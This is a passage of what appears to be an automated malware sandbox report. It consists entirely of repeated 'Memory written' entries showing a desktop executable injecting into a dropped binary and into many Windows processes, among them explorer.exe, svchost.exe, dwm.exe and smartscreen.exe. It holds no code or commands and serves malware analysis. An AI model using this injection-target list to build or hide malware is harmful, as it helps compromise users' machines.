            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2660000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: FA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 3C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 3D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: FE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2920000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2970000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 6E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 740000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2290000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 22B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2800000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2810000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 24F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2500000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2B60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2BB0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 29A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 29F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 720000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2150000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: DF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: E00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: AE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2BC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2BD0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1250000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1260000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 880000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 21B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2330000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2380000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: AC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: AD0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: F90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: FA0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2780000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2790000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 11A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 11B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2DD0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 3020000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 780000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 790000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 1370000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 13C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B00000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: B10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 14C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 14D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2500000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2560000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: C70000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: CC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2940000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 2950000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: AF0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 7A0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe base: 7B0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 9E0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: AE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dwm.exe base: 20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\sihost.exe base: 3C0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: 20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: 990000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ctfmon.exe base: AC0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\explorer.exe base: 2D10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: BE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CB0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 8D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: EE0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9D0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 960000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\smartscreen.exe base: 80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 20000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 130000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: C50000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2A0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\conhost.exe base: 590000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: DC0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: A90000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dllhost.exe base: 6C0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 9D0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: 9F0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: AF0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dwm.exe base: 30000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\sihost.exe base: 3D0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: 30000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: 9A0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ctfmon.exe base: AD0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\explorer.exe base: 2D30000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: BF0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CC0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8E0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: EF0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9E0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 970000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\smartscreen.exe base: 90000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 30000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 140000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: C60000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2B0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\conhost.exe base: 5A0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: DD0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: AA0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dllhost.exe base: 6D0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 9E0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: A00000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: B00000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dwm.exe base: 40000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\sihost.exe base: 3E0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: 40000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: 9B0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ctfmon.exe base: AE0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\explorer.exe base: 2D40000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: C00000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CD0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8F0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F00000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 9F0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 980000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\smartscreen.exe base: A0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 40000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 150000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: C70000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 2C0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\conhost.exe base: 5B0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: DE0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: AB0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dllhost.exe base: 6E0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 9F0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: A10000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\fontdrvhost.exe base: B10000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\dwm.exe base: 50000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\sihost.exe base: 3F0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: 50000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: 9C0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\ctfmon.exe base: AF0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\explorer.exe base: 2D50000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\svchost.exe base: C10000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: CE0000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 900000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: F10000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: A00000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\RuntimeBroker.exe base: 990000
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe    Memory written: C:\Windows\System32\smartscreen.exe base: B0000
